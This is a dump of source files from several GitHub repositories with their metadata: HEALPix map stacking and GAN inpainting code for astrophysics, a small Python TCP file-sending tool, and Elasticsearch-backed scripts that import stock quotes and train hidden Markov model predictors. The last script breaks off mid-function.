maskdmap=np.load(fname_masked)\n holemask = np.ma.masked_not_equal(maskdmap,0) .mask\n maxval = maskdmap[holemask].max() ; minval = maskdmap[holemask].min()\n maskdmap = np.expand_dims(np.expand_dims( maskdmap, axis=0), axis=-1)\n maskdmap = (maskdmap -minval) / (maxval - minval)\n if method =='Deep-Prior':\n randstate= np.random.RandomState(seed)\n noisemap = randstate.uniform( size=maskdmap.shape )\n return [ maskdmap, noisemap , minval, maxval]\n else :\n return maskdmap, minval, maxval\n" }, { "alpha_fraction": 0.5251629948616028, "alphanum_fraction": 0.5543676614761353, "avg_line_length": 32.640350341796875, "blob_id": "9431e2d5f78e84d53d1d6a31cdb757be5548e225", "content_id": "60238f0a3616c7ca1f4a34ea6ba7af98ee6dde9e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3835, "license_type": "permissive", "max_line_length": 108, "num_lines": 114, "path": "/picasso/MPI_healpix2stack.py", "repo_name": "sopXx/picasso", "src_encoding": "UTF-8", "text": "#\n#\n#\n#\n# date: 2019-08-20\n# author: GIUSEPPE PUGLISI\n# python3.6\n# Copyright (C) 2019 Giuseppe Puglisi [email protected]\n#\n\n\nimport healpy as hp\nimport numpy as np\nimport argparse\nfrom mpi4py import MPI\n\nfrom utils import utils\n\nfrom utils import (\n setup_input,\n h2f,\n set_header,\n rd2tp\n\n)\n\n\n\ndef main(args):\n\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n nprocs = comm.Get_size()\n glob_ra,glob_dec, _ = np.loadtxt(args.ptsourcefile ,unpack=True)\n\n localsize = glob_ra.shape[0]/nprocs ## WARNING: this MUST evenly divide!!!!!!\n\n ra = glob_ra[slice( rank *localsize , (rank +1)* localsize)]\n dec = glob_dec[slice( rank *localsize , (rank +1)* localsize)]\n\n Nstacks= ra.shape [0]\n Npix = 128 #This is hard-coded because of the architecture of both CNN\n if args.pol :\n keys = ['T', 'Q', 'U']\n inputmap = hp.read_map(args.hpxmap ,field=[0,1,2] )\n else:\n keys = ['T' ]\n\n inputmap = [hp.read_map( args.hpxmap) ]\n\n mask = np.ones_like (inputmap[0] )\n beam =np.deg2rad( args.beamsize /60.)\n\n\n nside = hp.get_nside(inputmap)\n size_im = {2048: 192. ,4096 : 64. }\n for i in range(Nstacks):\n sizepatch = size_im[nside]*1. /Npix/60.\n header = set_header(ra[i],dec[i], sizepatch )\n\n tht,phi = rd2tp(ra[i],dec[i])\n vec = hp.ang2vec( theta = tht,phi =phi )\n pixs = hp.query_disc(nside,vec,3* beam)\n mask[pixs] = 0\n\n for k,j in zip(keys, range(len(inputmap)) ) :\n \tnp.save(args.stackfile+k+'_{:.5f}_{:.5f}_masked'.format(ra[i],dec[i] ),\n h2f(mask * inputmap[j] ,header))\n \tnp.save(args.stackfile+k+'_{:.5f}_{:.5f}'.format(ra[i],dec[i]) , h2f(inputmap[j] ,header) )\n\n if i %100 ==0 and rank ==0 :\n print(\"Stacking %d source \"%i )\n\n\n comm.Barrier()\n\n if rank ==0 :\n print (\"collecting stacks to 1 single file\" )\n globT = np.zeros( (Nstacks, 128,128))\n mglobT = np.zeros( (Nstacks, 128,128))\n if args.pol :\n globQ = np.zeros( (Nstacks, 128,128))\n globU = np.zeros( (Nstacks, 128,128))\n mglobQ = np.zeros( (Nstacks, 128,128))\n mglobU = np.zeros( (Nstacks, 128,128))\n for i in range(Nstacks):\n globT[i,:,: ] =np.load (args.stackfile+ 'T_{:.5f}_{:.5f}.npy'.format(ra[i],dec[i] ))\n mglobT[i,:,: ] =np.load (args.stackfile+ 'T_{:.5f}_{:.5f}_masked.npy'.format(ra[i],dec[i] ))\n if args.pol:\n globQ[i,:,: ] =np.load (args.stackfile+ 'Q_{:.5f}_{:.5f}.npy'.format(ra[i],dec[i] ))\n mglobQ[i,:,: ] =np.load (args.stackfile+ 'Q_{:.5f}_{:.5f}_masked.npy'.format(ra[i],dec[i] ))\n globU[i,:,: ] =np.load (args.stackfile+ 'U_{:.5f}_{:.5f}.npy'.format(ra[i],dec[i] ))\n mglobU[i,:,: ] =np.load (args.stackfile+ 'U_{:.5f}_{:.5f}_masked.npy'.format(ra[i],dec[i] ))\n np.save(args.stackfile+'T_masked', mglobT)\n np.save(args.stackfile+'T' , globT)\n if args.pol:\n np.save(args.stackfile+'Q_masked', mglobQ)\n np.save(args.stackfile +'Q', globQ)\n np.save(args.stackfile+'U_masked', mglobU)\n np.save(args.stackfile+'U' , globU)\n comm.Barrier()\n\n comm.Disconnect\n\n\n\nif __name__==\"__main__\":\n\tparser = argparse.ArgumentParser( description=\"prepare training and testing dataset from a healpix map \" )\n\tparser.add_argument(\"--hpxmap\" , help='path to the healpix map to be stacked, no extension ' )\n\tparser.add_argument(\"--beamsize\", help = 'beam size in arcminutes of the input map', type=np.float )\n\tparser.add_argument(\"--stackfile\", help='path to the file with stacked maps')\n\tparser.add_argument(\"--pol\", action=\"store_true\" , default=False )\n\targs = parser.parse_args()\n\tmain( args)\n" }, { "alpha_fraction": 0.5742760300636292, "alphanum_fraction": 0.5874388813972473, "avg_line_length": 31.414634704589844, "blob_id": "90e9b5d378ed8ac2d6f9982b90de55e39202fdae", "content_id": "991c9aa4d03b543410d1ef17a9b296040a6e07eb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2659, "license_type": "permissive", "max_line_length": 77, "num_lines": 82, "path": "/picasso/inpainters/contextual_attention_gan.py", "repo_name": "sopXx/picasso", "src_encoding": "UTF-8", "text": "\n#\n#\n#\n#\n# date: 2019-08-20\n# author: GIUSEPPE PUGLISI\n# python3.6\n# Copyright (C) 2019 Giuseppe Puglisi [email protected]\n#\n\n\n\nimport numpy as np\nimport tensorflow as tf\nimport neuralgym as ng\nfrom .generative_inpainting_model import InpaintCAModel\n\nclass ContextualAttention(InpaintCAModel) :\n def __init__(self, modeldir = None , verbose=False ):\n self.checkpoint_dir = modeldir\n self.verbose=verbose\n\n super(ContextualAttention , self).__init__()\n\n def setup_input(self,fname_masked ):\n maskdmap=np.load(fname_masked)\n holemask = np.ma.masked_not_equal(maskdmap,0) .mask\n maxval = maskdmap[holemask].max() ; minval = maskdmap[holemask].min()\n maskdmap = (maskdmap -minval) / (maxval - minval)\n self.X = maskdmap;\n self.mask = np.int_(holemask )\n self.min = minval; self.max = maxval\n pass\n\n def preprocess_input ( self, image, mask ) :\n self.h, self.w,_ = image.shape\n grid = 8\n image = image[:self.h//grid*grid, :self.w//grid*grid, :]\n mask = mask[:self.h//grid*grid, :self.w//grid*grid, :]\n\n if self.verbose : print('Shape of image: {}'.format(image.shape))\n\n image = np.expand_dims(image, 0)\n mask = np.expand_dims(mask, 0)\n input_image = np.concatenate([image, mask], axis=2)\n input_image = tf.constant(input_image, dtype=tf.float32)\n return input_image\n\n\n def postprocess_output ( self, output,sess ):\n\n output = (output + 1.) * 127.5\n output = tf.reverse(output, [-1])\n output = tf.saturate_cast(output, tf.uint8)\n # load pretrained model\n vars_list = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)\n assign_ops = []\n for var in vars_list:\n vname = var.name\n from_name = vname\n var_value = tf.contrib.framework.load_variable(\n self.checkpoint_dir,\n from_name)\n assign_ops.append(tf.assign(var, var_value))\n sess.run(assign_ops)\n if self.verbose : print('ContextualAttention Model loaded.')\n result = sess.run(output)\n\n outarray = result[0][:, :, ::-1].mean(axis=-1,\n keepdims=1) .reshape(self.h,self.w)\n return outarray /255.\n\n\n def predict (self, image , mask ):\n\n sess_config = tf.ConfigProto()\n sess_config.gpu_options.allow_growth = True\n with tf.Session(config=sess_config) as sess:\n input_image = self.preprocess_input( image, mask )\n output = self.build_server_graph(input_image)\n out = self.postprocess_output(output, sess )\n return out\n" }, { "alpha_fraction": 0.7333333492279053, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 23.363636016845703, "blob_id": "ab0fa36d040aaca66232c22e5bc542960e367b28", "content_id": "6e3731d3121785f74420addbff663b4023cf6c89", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 270, "license_type": "permissive", "max_line_length": 94, "num_lines": 11, "path": "/README.md", "repo_name": "sopXx/picasso", "src_encoding": "UTF-8", "text": "# picasso\nPython Inpainter for Cosmological and Astrophysical SOurces \n\n- Deep Prior Inpainter\t \n- Contextual Attention (WGAN ) \n\n# Requirements\n\n- `tensorflow` \n- `keras` \n- ( to run GAN inpainter ) `neuralgym `pip install git+https://github.com/JiahuiYu/neuralgym`\n\n\n" } ]
7
KevinAS28/Python-share-send-and-receive-files
https://github.com/KevinAS28/Python-share-send-and-receive-files
4e2c1139df14ef89157b6b862964013decd5a7f5
90c4bfd19a4a77574efdb42dc8c73f1723343859
617d61bdcabd7d64dc7d401d76b49412ab5e0005
refs/heads/master
2020-04-23T16:03:08.060940
2019-02-18T12:59:30
2019-02-18T12:59:30
171,284,833
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6188833117485046, "alphanum_fraction": 0.6286072731018066, "avg_line_length": 26.921052932739258, "blob_id": "40b06268cf8df890ee2dff4cd16f4d60a1088399", "content_id": "cfc4c87cf9deb57e3307bb5d90cfc9b50e72a88f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3188, "license_type": "no_license", "max_line_length": 158, "num_lines": 114, "path": "/simple-ftp.py", "repo_name": "KevinAS28/Python-share-send-and-receive-files", "src_encoding": "UTF-8", "text": "import socket\nimport getopt\nimport os\nimport sys\nfrom threading import Thread\n\ndef usage():\n print(\"Simple FTP by Kevin Agusto\")\n print(\"to receive files, simply python simftp.py -ip <your ip (not necessary)> -p <port number> -r -l </home/my/location/ (all your files will downloaded)>\")\n print('to send a file, python simftp.py -ip <ip> -p <port number> -s \"myfile.rar\" ')\n print('to multiple files, python simftp.py -ip <ip> -p <port number> -s \"myfile.rar yourfile.rar /home/thisisfile.exe\" ')\n print(\"or just hit python simftp.py to guided options\")\n sys.exit(0)\n return\n\nglobal the_files\nmode = \"g\" #guided\nip = \"\"\nport = 21\nthe_files = []\n \ntry:\n opts, args = getopt.getopt(sys.argv[1:], \"hle:a:p:m:f\", [\"help\", \"address\", \"port\", \"mode\", \"files\"])\nexcept getopt.GetoptError as jadierror:\n print(str(jadierror))\n usage()\n\nfor o, a in opts:\n if o in [\"-a\", \"--addr\", \"-addr\", \"--address\"]:\n ip = str(a)\n elif o in [\"-p\", \"--port\"]:\n port = int(a)\n elif o in [\"-m\", \"--mode\"]:\n mode = str(a)\n elif o in [\"-h\", \"--help\"]:\n usage()\n elif o in [\"-f\", \"--files\"]:\n the_files = args[0].split()\n \nif mode == \"g\":\n mode = str(input(\"you will receive files or send files? [R/S] \")).lower()\n if mode == \"r\":\n ip = str(input(\"your ip: (not necessary) \"))\n port = str(input(\"port number (21 is default): \"))\n if not len(port):\n port = 21\n else:\n port = int(port)\n the_files = str(input(\"the address files will downloaded(not necessary): \"))\n if not len(the_files):\n the_files = str(os.getcwd())\n \n if mode == \"s\":\n ip = str(input(\"the receiver ip: \"))\n if ip==\"\":\n print(\"error, ip must be exist\")\n sys.exit(0)\n port = input(\"the receiver port: (21 is default) \")\n if not len(port):\n port = 21\n else:\n port = int(port)\n the_files.clear()\n while True:\n what = str(input(\"type the file address or file name (if you finsih, just hit enter with blank): \"))\n if not len(what):\n break\n the_files.append(what)\n\ntcp_ip = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ndef sendfiles():\n global the_files\n global ip\n global port\n tcp_ip.connect((ip, port))\n for a in the_files:\n to_send = b\"%s<this is seperate>\" %(bytes(a.encode(\"utf-8\")))\n with open(a, \"rb\") as the_data:\n to_send += the_data.read()\n tcp_ip.send(to_send)\n print(tcp_ip.recv(4096).decode(\"utf-8\"))\n tcp_ip.close()\n\nclass recvfiles:\n global the_files\n def __init__(self):\n global the_files\n if not os.access(the_files, os.R_OK):\n print(\"[WARNING] the directory is cannot be accessed\")\n the_files = str(os.getcwd())\n os.chdir(the_files)\n tcp_ip.bind((ip, port))\n tcp_ip.listen()\n \n def client_handler(self, client_socket):\n data = client_socket.recv(1024).split(b\"<this is seperate>\")\n open(data[0], \"w+\")\n with open(data[0], \"wb\") as yeah:\n yeah.write(data[1])\n client_socket.send((\"successfull send %s\" %(data[0])).encode(\"utf-8\"))\n client_socket.close()\n def run(self):\n print(\"Waiting for sender...\")\n while True:\n client, addr = tcp_ip.accept()\n print(\"Received incoming data from %s:%d\" %(addr[0], addr[1]))\n Thread(target=self.client_handler, args=[client]).start()\n\nif __name__ == \"__main__\":\n if mode == \"r\":\n recvfiles().run()\n else:\n sendfiles()\n \n " }, { "alpha_fraction": 0.8055555820465088, "alphanum_fraction": 0.8055555820465088, "avg_line_length": 53, "blob_id": "05afbba6caada01add428cca0d9ed8715b3be953", "content_id": "14b81a2e427ed2555905707eb3cfbf01189a21b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 108, "license_type": "no_license", "max_line_length": 98, "num_lines": 2, "path": "/README.md", "repo_name": "KevinAS28/Python-share-send-and-receive-files", "src_encoding": "UTF-8", "text": "A python program to send and receive files. its not using FTP protocols. just using TCP connection\nKevin AS\n" } ]
2
chandrab/bombogenesis
https://github.com/chandrab/bombogenesis
480fc776acc6153286c1191a00a82f730744fd67
42c600242922ccc2aa527e6375f45de39fd3f397
34ec1a6e5704cdec65474eb90190190f693296f1
refs/heads/master
2021-03-20T06:37:48.019261
2019-03-21T22:33:12
2019-03-21T22:33:12
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5610322952270508, "alphanum_fraction": 0.5689823627471924, "avg_line_length": 31.967741012573242, "blob_id": "4d474f3ad6edf1a49799006bae0a2bb31dcc2866", "content_id": "c7e25ee719e28be3ce11126926a959c6cd7d6d4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8176, "license_type": "no_license", "max_line_length": 164, "num_lines": 248, "path": "/train.py", "repo_name": "chandrab/bombogenesis", "src_encoding": "UTF-8", "text": "import warnings\nimport logging\nimport itertools\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom hmmlearn.hmm import GaussianHMM, MultinomialHMM, GMMHMM\nfrom sklearn.model_selection import train_test_split\nfrom tqdm import tqdm\nfrom docopt import docopt\nfrom elasticsearch import helpers, Elasticsearch\nimport csv\nfrom pandas.io.json import json_normalize\nfrom datetime import datetime\nfrom objdict import ObjDict\nimport json\nimport datetime\n\nINDEX_NAME = 'predictions'\nTYPE_NAME = 'outcome'\nID_FIELD = 'date'\n\nquery = '''{\n\"query\": {\n\"bool\": {\n\"filter\": [\n{\n \"bool\": {\n \"filter\": [\n {\n \"bool\": {\n \"should\": [\n {\n \"match_phrase\": {\n \"ticker\": \"%s\"\n }\n }\n ],\n \"minimum_should_match\": 1\n }\n },\n {\n \"bool\": {\n \"should\": [\n {\n \"range\": {\n \"timestamp\": {\n \"%s\": \"%s\"\n }\n }\n }\n ],\n \"minimum_should_match\": 1\n }\n }\n ]\n }\n}\n],\n\"should\": [],\n\"must_not\": []\n}}}'''\n\nes = Elasticsearch()\n\nclass ESProxy(object):\n\n def delete_and_create_index(self):\n\n if es.indices.exists(INDEX_NAME):\n print(\"deleting '%s' index...\" % (INDEX_NAME))\n res = es.indices.delete(index = INDEX_NAME)\n\n request_body = {\n \"settings\" : {\n \"number_of_shards\": 1,\n \"number_of_replicas\": 0\n }\n }\n print(\"creating '%s' index...\" % (INDEX_NAME))\n res = es.indices.create(index = INDEX_NAME, body = request_body)\n\nclass StockPredictor(object):\n\n def __init__(self, ticker, n_hidden_states=5, n_latency_days=10, n_steps_frac_change=50, n_steps_frac_high=30, n_steps_frac_low=10, n_iter=1000, verbose=False):\n\n self.verbose = verbose\n self.ticker = ticker\n self.n_latency_days = n_latency_days\n\n self.hmm = GMMHMM(n_components=n_hidden_states, n_iter=n_iter)\n\n self.fetch_training_data()\n self.fetch_latest_data() # to predict\n\n self._compute_allall_possible_outcomes(n_steps_frac_change, n_steps_frac_high, n_steps_frac_low)\n\n def fetch_latest_data(self):\n\n print(\"Fetching latest data ...\")\n res = es.search(index=\"market\", doc_type=\"quote\", size=10000, body={\"query\": {\"match\": {\"ticker\": self.ticker}}})\n latest_data = json_normalize(res['hits']['hits'])\n self.latest_data = latest_data.tail(1)\n if self.verbose: print(\"Latest data:\\n%s\" % self.latest_data)\n\n def fetch_training_data(self):\n\n print(\"Fetching training data ...\")\n res = es.search(index=\"market\", doc_type=\"quote\", size=10000, body={\"query\": {\"match\": {\"ticker\": self.ticker}}})\n self.training_data = json_normalize(res['hits']['hits'])\n self.training_data.drop(self.training_data.tail(1).index,inplace=True)\n print(\"%s records to train %s\" % (len(self.training_data.index), self.ticker))\n if self.verbose: print(\"Latest record for training:\\n%s\" % self.training_data.tail(1))\n\n # tbd - to use es instead\n #q = query % (self.ticker, \"lt\", datetime.date.today().strftime(\"%Y-%m-%d\"))\n #print(q)\n #res = es.search(index=INDEX_NAME, doc_type=TYPE_NAME, size=10000, body=query)\n\n @staticmethod\n def _extract_features(data):\n\n frac_change = np.array(data['_source.change']) #(close_price - open_price) / open_price\n frac_high = np.array(data['_source.change_high']) #(high_price - open_price) / open_price\n frac_low = np.array(data['_source.change_low']) #(open_price - low_price) / open_price\n\n return np.column_stack((frac_change, frac_high, frac_low))\n\n def fit(self):\n print('Extracting Features')\n feature_vector = StockPredictor._extract_features(self.training_data)\n if self.verbose: print(\"feature vector %s\" % feature_vector)\n print('Training Model with %s features' % feature_vector.size)\n print(\"Latest date to be used in training is %s\" % self.training_data.tail(1)['_source.timestamp'].values[0])\n self.hmm.fit(feature_vector)\n print('Model trained')\n\n def _compute_allall_possible_outcomes(self, n_steps_frac_change,\n n_steps_frac_high, n_steps_frac_low):\n frac_change_range = np.linspace(-0.1, 0.1, n_steps_frac_change)\n frac_high_range = np.linspace(0, 0.1, n_steps_frac_high)\n frac_low_range = np.linspace(0, 0.1, n_steps_frac_low)\n\n self.all_possible_outcomes = np.array(list(itertools.product(\n frac_change_range, frac_high_range, frac_low_range)))\n\n def json_data_for_outcome(self, day, outcome, score):\n\n rows = list()\n\n # meta\n ticker = day['_source.ticker']\n date = day['_source.timestamp']\n vector = outcome\n id = \"%s-%s-%s\" % (ticker, date, vector)\n\n meta = {\n \"index\": {\n \"_index\": INDEX_NAME,\n \"_type\": TYPE_NAME,\n \"_id\": id\n }\n }\n rows.append(json.dumps(meta))\n\n # data\n row = ObjDict()\n row.frac_change = outcome[0]\n row.frac_high_range = outcome[1]\n row.frac_low_range = outcome[2]\n open_price = day['_source.open'].values[0]\n predicted_close = open_price * (1 + outcome[0])\n expected_value = outcome[0] * score\n row.predicted_close = predicted_close\n row.expected_value = expected_value\n row.timestamp = day['_source.timestamp'].values[0]\n row.score = score\n row.ticker = day['_source.ticker'].values[0]\n rows.append(json.dumps(row))\n\n return rows\n\n def predict_outcomes(self):\n\n print(\"predicting outcomes for: %s\" % self.latest_data['_source.timestamp'].values[0])\n previous_testing_data = self.training_data.tail(self.n_latency_days).index\n\n if self.verbose:\n print(\"previous_testing_data %s\" % previous_testing_data)\n\n test_data = self.training_data.iloc[previous_testing_data]\n\n if self.verbose:\n print(\"Using the following slice of data:\")\n print(\"[%s]\" % previous_testing_data)\n print(test_data)\n\n test_data_features = StockPredictor._extract_features(test_data)\n\n # to blow everything away - may need to recreate/refresh indexes in ES!\n #self.delete_and_create_index()\n\n bulk_data = list()\n outcome_score = []\n\n for possible_outcome in self.all_possible_outcomes:\n\n test_feature_vectors = np.row_stack((test_data_features, possible_outcome))\n\n if self.verbose:\n print(\"Final test feature set:\")\n print(\"[%s]\" % test_feature_vectors)\n\n score = self.hmm.score(test_feature_vectors)\n\n # ignoring scores <= 0\n if score > 0:\n rows = self.json_data_for_outcome(self.latest_data, possible_outcome, score)\n bulk_data.append(rows)\n\n # format for ES, ugly\n es_array = \"\"\n for row in bulk_data:\n es_array += row[0]\n es_array += \"\\n\"\n es_array += row[1]\n es_array += \"\\n\"\n\n #print(\"Deleting prediction data for ... %s\" % day['_source.ticker'])\n #es.delete_by_query(index=INDEX_NAME,doc_type=TYPE_NAME, body={'query': {'match': {'ticker': day['_source.ticker']}}})\n\n print(\"Exporting predictions to ES\")\n if self.verbose: print(es_array)\n res = es.bulk(index = INDEX_NAME, body = es_array, refresh = True)\n\nif __name__ == '__main__':\n with open('nasdaq100list.csv', 'r') as f:\n reader = csv.reader(f)\n stocks = list(reader)\n for stock in stocks:\n ticker = stock[0]\n if ticker == \"Symbol\": continue\n try:\n stock_predictor = StockPredictor(ticker=ticker, verbose=False)\n stock_predictor.fit()\n stock_predictor.predict_outcomes()\n except:\n print(\"Failed to train models for %s\" % ticker)\n" }, { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.7917932868003845, "avg_line_length": 49.61538314819336, "blob_id": "82deaf3f6379a12354eee263b7583c5e83cf6812", "content_id": "ce9b648ce36e72d0be8647dc562797fee289ab40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 658, "license_type": "no_license", "max_line_length": 321, "num_lines": 13, "path": "/README.md", "repo_name": "chandrab/bombogenesis", "src_encoding": "UTF-8", "text": "# bombogenesis\nStock Market Prediction using Python, Hidden Markov Models and ElasticSearch\n\n# Why the name ?\n\nI needed a name for my project and this week in Denver we're about to get hit with this winter storm:\n\nAccording to the description:\n\n_What's a \"bomb cyclone\"?\nA bomb cyclone is a real meteorological term. Bombogenesis is when a midlatitude cyclone rapidly intensifies 24 mb in 24 hours. This storm does have that potential! I personally don't love this term because it can get sensationalized on social media, but it is technically accurate and certainly looks likely with storm._\n\nI thought it was a pretty sweet term so used it for my project.\n" }, { "alpha_fraction": 0.5355227589607239, "alphanum_fraction": 0.5442359447479248, "avg_line_length": 29.040267944335938, "blob_id": "bd8fcd6fdbe3d774959628064bb58f66b189183e", "content_id": "2a2536a097714a9181852d265744020b25880741", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4476, "license_type": "no_license", "max_line_length": 110, "num_lines": 149, "path": "/import.py", "repo_name": "chandrab/bombogenesis", "src_encoding": "UTF-8", "text": "\"\"\"import.py\n\nUsage:\n import.py <ticker>\n\n\"\"\"\n\nfrom elasticsearch import helpers, Elasticsearch\nimport csv\nfrom pandas_datareader import data\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport json\nfrom objdict import ObjDict\nimport datetime\nimport time\nfrom hmmlearn.hmm import GaussianHMM\nimport numpy as np\nimport itertools\nfrom docopt import docopt\n\nINDEX_NAME = 'market'\nTYPE_NAME = 'quote'\nID_FIELD = 'date'\n\nes = Elasticsearch()\n\nclass Importer(object):\n\n def __init__(self, ticker):\n self.ticker = ticker\n\n def es_date_format(self, time):\n return time.strftime('%Y-%m-%dT06:00:00')\n\n def delete_and_create_index(self):\n\n if es.indices.exists(INDEX_NAME):\n print(\"deleting '%s' index...\" % (INDEX_NAME))\n res = es.indices.delete(index = INDEX_NAME)\n\n request_body = {\n \"settings\" : {\n \"number_of_shards\": 1,\n \"number_of_replicas\": 0\n }\n }\n print(\"creating '%s' index...\" % (INDEX_NAME))\n res = es.indices.create(index = INDEX_NAME, body = request_body)\n\n def json_data_for_ticker(self, ticker, datasource, start_date, end_date):\n rows = list()\n dp = data.DataReader(ticker, datasource, start_date, end_date)\n for tuple in dp.iterrows():\n\n date = int(time.mktime(tuple[0].timetuple()))\n id = \"%s-%s\" % (date, ticker)\n meta = {\n \"index\": {\n \"_index\": INDEX_NAME,\n \"_type\": TYPE_NAME,\n \"_id\": id\n }\n }\n rows.append(meta)\n\n row = ObjDict()\n\n\n row.timestamp= self.es_date_format(tuple[0])\n row._timestamp= self.es_date_format(tuple[0])\n row.adjusted_close = tuple[1][5]\n row.ticker = ticker\n\n row.volume = tuple[1][4]\n open_price = tuple[1][2]\n close_price = tuple[1][3]\n high_price = tuple[1][0]\n low_price = tuple[1][1]\n row.open = open_price\n row.close = close_price\n row.high = high_price\n row.low = low_price\n row.change = (close_price - open_price) / open_price\n row.change_high = (high_price - open_price) / open_price\n row.change_low = (open_price - low_price) / open_price\n\n rows.append(json.dumps(row))\n\n return rows\n\n def fetch_data(self):\n start_date = '1990-01-01'\n end_date = datetime.date.today().strftime(\"%Y-%m-%d\")\n datasource = \"yahoo\"\n print(\"fetching data for %s between %s and %s\" % (self.ticker, start_date, end_date))\n data = self.json_data_for_ticker(self.ticker, datasource, start_date, end_date)\n self.data = data\n\n def import_data(self):\n es_array = \"\"\n for row in self.data:\n es_array += str(row)\n es_array += \"\\n\"\n print(\"importing ... %s\" % data)\n print(\"importing %s records to ES\" % len(self.data))\n\n res = es.bulk(index = INDEX_NAME, body = self.data, refresh = True)\n\n# arguments = docopt(__doc__, version='import 0.1')\n# ticker= arguments['<ticker>']\n\n# data = fetch_data(ticker)\n# import_data(data)\n\ndef delete_all_stock_data():\n print(\"Deleting all stock data\")\n es.delete_by_query(index=INDEX_NAME,doc_type=TYPE_NAME, body={'query': {'match_all': {}}})\n\ndef import_ticker(ticker, delete=False):\n\n if delete:\n print(\"Deleting stock data for ... %s\" % ticker)\n es.delete_by_query(index=INDEX_NAME,doc_type=TYPE_NAME, body={'query': {'match': {'ticker': ticker}}})\n\n importer = Importer(ticker)\n importer.fetch_data()\n importer.import_data()\n\n#import_ticker(\"MDLZ\", delete=True)\n\nif __name__ == '__main__':\n arguments = docopt(__doc__, version='import 0.1')\n ticker = arguments['<ticker>']\n if ticker == \"ALL\":\n delete_all_stock_data()\n print(\"Fetching all data\")\n with open('sp500.csv', 'r') as f:\n reader = csv.reader(f)\n stocks = list(reader)\n for stock in stocks:\n ticker = stock[0]\n if ticker == \"Symbol\": continue\n try:\n import_ticker(ticker, delete=False)\n except:\n print(\"Failed to import %s\" % ticker)\n else:\n import_ticker(ticker, delete=True)\n" }, { "alpha_fraction": 0.5840452909469604, "alphanum_fraction": 0.5919390916824341, "avg_line_length": 35.625850677490234, "blob_id": "8b11a838afe14c13d6383e5752ba6d9b44427007", "content_id": "43ef438aa54fa55561b1024bf0138d160382dfb8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10768, "license_type": "no_license", "max_line_length": 208, "num_lines": 294, "path": "/train15.py", "repo_name": "chandrab/bombogenesis", "src_encoding": "UTF-8", "text": "\"\"\"train.py\n\nUsage:\n train.py <ticker> <date>\n\n\"\"\"\n\nimport warnings\nimport logging\nimport itertools\nimport pandas as pd\nimport numpy as np\n#import matplotlib.pyplot as plt\nfrom hmmlearn.hmm import GaussianHMM, MultinomialHMM, GMMHMM\nfrom sklearn.model_selection import train_test_split\nfrom tqdm import tqdm\nfrom docopt import docopt\nfrom elasticsearch import helpers, Elasticsearch\nimport csv\nfrom pandas.io.json import json_normalize\nfrom datetime import datetime, timedelta\nfrom objdict import ObjDict\nimport json\nimport datetime\n\nINDEX_NAME = 'predictions'\nTYPE_NAME = 'outcome'\nTRADE_TYPE_NAME = 'trades'\nTRADE_INDEX_NAME = 'recommendation'\nID_FIELD = 'date'\n\nes = Elasticsearch()\n\nclass ESProxy(object):\n\n def delete_and_create_index(self):\n\n if es.indices.exists(INDEX_NAME):\n print(\"deleting '%s' index...\" % (INDEX_NAME))\n res = es.indices.delete(index = INDEX_NAME)\n\n request_body = {\n \"settings\" : {\n \"number_of_shards\": 1,\n \"number_of_replicas\": 0\n }\n }\n print(\"creating '%s' index...\" % (INDEX_NAME))\n res = es.indices.create(index = INDEX_NAME, body = request_body)\n\nclass StockPredictor(object):\n\n def __init__(self, ticker, chunks = 9, delta = 0, n_hidden_states=5, n_latency_days=10, n_steps_frac_change=10, n_steps_frac_high=30, n_steps_frac_low=10, n_iter=100, verbose=False, prediction_date=None):\n\n self.total_score = 0\n self.verbose = verbose\n self.ticker = ticker\n self.n_latency_days = n_latency_days\n self.hmm = GMMHMM(n_components=n_hidden_states, n_iter=n_iter)\n self.chunks = chunks\n self.delta = delta\n self.prediction_date = prediction_date\n self.fetch_training_data()\n self._compute_all_possible_outcomes(n_steps_frac_change, n_steps_frac_high, n_steps_frac_low)\n\n def fetch_training_data(self):\n\n print(\"Fetching training data ...\")\n res = es.search(index=\"market\", doc_type=\"quote\", size=10000, body={\"query\": {\"match\": {\"ticker\": self.ticker}}})\n self.training_data = json_normalize(res['hits']['hits'])\n self.chunked_training_data = self.training_data\n\n #vectors = []\n #chunked_training_data_lengths = []\n #start_index = 0\n #end_index = start_index + self.chunks\n #delta_date_index = end_index + self.delta\n\n #while delta_date_index <= len(self.training_data):\n #training_chunk = self.training_data[start_index:end_index]\n # delta_chunk = self.training_data.iloc[delta_date_index]\n # total_chunk = training_chunk.append(delta_chunk)\n # #print(\"%s training_chunk to train %s\" % (total_chunk, self.ticker))\n # start_index = end_index + 1\n # end_index = start_index + self.chunks\n # delta_date_index = end_index + self.delta\n # vectors.append(total_chunk)\n # chunked_training_data_lengths.append(len(total_chunk))\n # if self.verbose: print(total_chunk)\n\n #self.chunked_training_data = pd.DataFrame(np.concatenate(vectors), columns = self.training_data.columns)\n #self.chunked_training_data_lengths = chunked_training_data_lengths\n\n if self.verbose: print(\"Latest record for training:\\n%s\" % self.chunked_training_data.tail(1))\n latest_date = self.chunked_training_data.tail(1)['_source.timestamp']\n datetime_object = datetime.datetime.strptime(latest_date.values[0], '%Y-%m-%dT%H:%M:%S')\n\n if self.prediction_date == None:\n prediction_date = datetime_object + timedelta(days=self.delta + 1)\n self.prediction_date = datetime.datetime.strftime(prediction_date, '%Y-%m-%dT%H:%M:%S')\n\n @staticmethod\n def _extract_features(data):\n\n frac_change = 